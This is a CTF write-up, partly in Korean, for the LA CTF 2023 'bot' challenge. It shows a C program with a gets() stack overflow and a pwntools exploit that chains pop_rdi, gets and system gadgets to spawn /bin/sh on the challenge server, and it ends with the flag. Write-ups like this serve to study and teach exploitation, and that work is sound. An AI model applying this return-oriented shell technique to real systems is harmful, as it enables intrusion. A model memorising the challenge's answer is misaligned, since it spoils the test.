La CTF 2023 - bot

WriteUpLa

I made a bot to automatically answer all of your questions.
nc lac.tf 31180

  • [197 solves / 363 points]

Analysis

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

int main(void) {
  setbuf(stdout, NULL);
  char input[64];
  volatile int give_flag = 0;
  puts("hi, how can i help?");
  gets(input);
  if (strcmp(input, "give me the flag") == 0) {
    puts("lol no");
  } else if (strcmp(input, "please give me the flag") == 0) {
    puts("no");
  } else if (strcmp(input, "help, i have no idea how to solve this") == 0) {
    puts("L");
  } else if (strcmp(input, "may i have the flag?") == 0) {
    puts("not with that attitude");
  } else if (strcmp(input, "please please please give me the flag") == 0) {
    puts("i'll consider it");
    sleep(15);
    if (give_flag) {
      puts("ok here's your flag");
      system("cat flag.txt");
    } else {
      puts("no");
    }
  } else {
    puts("sorry, i didn't understand your question");
    exit(1);
  }
}

give_flag 변수 값을 입력 값을 통해서 바꿔줄 수가 없다. 다행히 system 함수 주소가 존재하니 bss 영역에 ‘/bin/sh\x00’을 쓰고 system 함수를 실행시키면 된다.

Solve

Exploit Code

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
from pwn import *

context.arch = 'amd64'
# context.log_level = 'DEBUG'

# p = process('./bot')
p = remote('lac.tf', 31180)
e = ELF('./bot')

pop_rdi = 0x40133b
ret = 0x401016

payload = b'may i have the flag?\x00'
payload += b'A' * (64 - len(payload))
payload += b'B' * 8
payload += p64(pop_rdi)
payload += p64(0x404068)
# payload += p64(ret)
payload += p64(e.plt['gets'])

payload += p64(pop_rdi)
payload += p64(0x404068)
# payload += p64(ret)
payload += p64(e.sym['system'])

pause()
p.sendlineafter('?', payload)
p.sendline('/bin/sh\x00')

p.interactive()

Flag

1
lactf{hey_stop_bullying_my_bot_thats_not_nice}